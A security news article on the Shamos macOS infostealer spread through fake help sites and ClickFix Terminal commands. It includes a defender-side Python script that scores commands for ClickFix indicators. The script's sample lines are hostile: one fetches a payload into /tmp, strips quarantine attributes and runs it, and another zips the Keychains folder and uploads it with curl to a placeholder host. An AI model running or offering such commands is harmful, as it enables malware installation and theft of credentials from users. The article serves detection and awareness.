Fake macOS Help Sites Spread Shamos Infostealer via ClickFix

Summary
– Criminals are using fraudulent macOS help websites and Google ads to trick users into installing the Shamos infostealer by having them run malicious commands.
– The Shamos malware, a variant of the Atomic macOS infostealer, steals sensitive data like Keychain entries, browser credentials, and cryptocurrency wallet files.
– Attackers employ the ClickFix technique to bypass macOS security features like Gatekeeper by having users execute commands directly in Terminal.
– ClickFix is a growing social engineering tactic effective across Windows, macOS, and Linux due to convincing lures and technical-looking instructions.
– Threat actors are widely adopting and evolving ClickFix, with builders sold on hacker forums and similar techniques like FileFix emerging.
Cybercriminals are increasingly exploiting the trust of macOS users seeking technical support by luring them into installing the Shamos infostealer malware through deceptive help websites. A recent campaign observed between June and August 2025 used malicious Google ads to direct users to fraudulent domains like mac-safer[.]com and rescue-mac[.]com. These sites provided what appeared to be legitimate troubleshooting steps but actually guided users to execute a harmful command in Terminal, leading to the installation of Shamos.
This malware employs the ClickFix social engineering technique, which relies on users manually running commands to bypass macOS security protections like Gatekeeper. Once executed, the malicious script downloads the Shamos executable into the /tmp directory, strips extended attributes to evade detection, grants execution permissions, and runs the stealer. The malware performs anti-virtual machine checks to avoid analysis environments and conducts extensive reconnaissance on the host system.
Shamos collects a wide range of sensitive data, including credentials from Keychain, Apple Notes, and various browsers. It also searches for cryptocurrency wallet files and exfiltrates the stolen information as a compressed archive using curl. Additionally, the malware attempts to download a spoofed Ledger Live application and a botnet module, and it establishes persistence through a Plist file.
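As a defender-side illustration of the command chain described above (an added example, not code from the article or from the researchers who reported the campaign), the following Python scores a shell one-liner against the ClickFix indicators the article names: a download into /tmp, extended-attribute stripping, chmod +x, execution from /tmp, and a curl file upload. The indicator names, verdict thresholds and sample command lines are this example's own assumptions, and the hosts in them are placeholders, not real indicators.

```python
import re
import shlex

# Indicator labels and the "core chain" are this example's own assumptions, not a vendor rule set.
CORE_CHAIN = {"download_to_tmp", "strip_xattr", "exec_from_tmp"}

def segments(command):
    """Split a shell one-liner on ; && || | and tokenise each piece."""
    pieces = re.split(r"\s*(?:&&|\|\||;|\|)\s*", command.strip())
    out = []
    for piece in pieces:
        if not piece:
            continue
        try:
            out.append(shlex.split(piece))
        except ValueError:          # unbalanced quotes: fall back to a naive split
            out.append(piece.split())
    return out

def triage(command):
    """Return the ClickFix-style indicators found in one command, plus a verdict."""
    hits = set()
    for toks in segments(command):
        if not toks:
            continue
        cmd = toks[0]
        in_tmp = any(t.startswith("/tmp/") for t in toks)
        if cmd in ("curl", "wget") and in_tmp and any(t in ("-o", "-O", "--output") for t in toks):
            hits.add("download_to_tmp")      # payload fetched straight into /tmp
        if cmd == "xattr" and ("-c" in toks or "com.apple.quarantine" in toks):
            hits.add("strip_xattr")          # quarantine flag removed, so Gatekeeper never prompts
        if cmd == "chmod" and any(t == "+x" or t.isdigit() for t in toks[1:]):
            hits.add("make_executable")
        target = toks[1] if cmd in ("sh", "bash", "zsh", "nohup") and len(toks) > 1 else cmd
        if target.startswith("/tmp/"):
            hits.add("exec_from_tmp")        # binary launched directly from /tmp
        if cmd == "curl" and any(t in ("-F", "--form", "-T", "--upload-file") or t.startswith("@") for t in toks):
            hits.add("curl_upload")          # outbound file post, the exfiltration step
    if CORE_CHAIN <= hits:
        verdict = "clickfix_chain"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "low" if hits else "benign"
    return {"indicators": sorted(hits), "verdict": verdict}

# Constructed sample lines (placeholder hosts, not indicators from the real campaign).
SAMPLE_COMMANDS = [
    "brew update && brew install iterm2",
    "curl -fsSL http://payload.example.invalid/update -o /tmp/update; "
    "xattr -c /tmp/update; chmod +x /tmp/update; /tmp/update",
    "zip -r /tmp/out.zip ~/Library/Keychains && curl -F file=@/tmp/out.zip http://c2.example.invalid/up",
]
```

A single indicator such as a curl upload is a weak signal on its own; the full chain of download, quarantine-flag removal and execution from /tmp is what makes the second sample stand out.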
In a separate malvertising effort, threat actors set up a fake GitHub repository offering a trojanized version of the iTerm2 terminal emulator. Its installation instructions included the same malicious command used in the help site campaign, giving the operation a second delivery channel.
The ClickFix method has gained significant traction among cybercriminals and advanced persistent threat (APT) groups due to its high success rate. This technique uses convincing error messages, fake CAPTCHAs, and simple-looking instructions that many users follow without understanding the risks. It effectively targets Windows, macOS, and Linux systems through various channels including phishing emails, social media platforms, and search engine ads.
Microsoft Threat Intelligence has reported that ClickFix builders are being sold on hacker forums, often bundled with other malicious tools that generate LNK, JavaScript, and SVG files. These kits sometimes include pre-built landing pages with lures mimicking legitimate services like Cloudflare.
The success of ClickFix has inspired the development of similar methods such as FileFix, which tricks users into executing malicious commands through everyday actions in Windows File Explorer. Security researchers note that threat actors are already experimenting with these new techniques, highlighting the need for increased user awareness and robust security measures.
(Source: HelpNet Security)


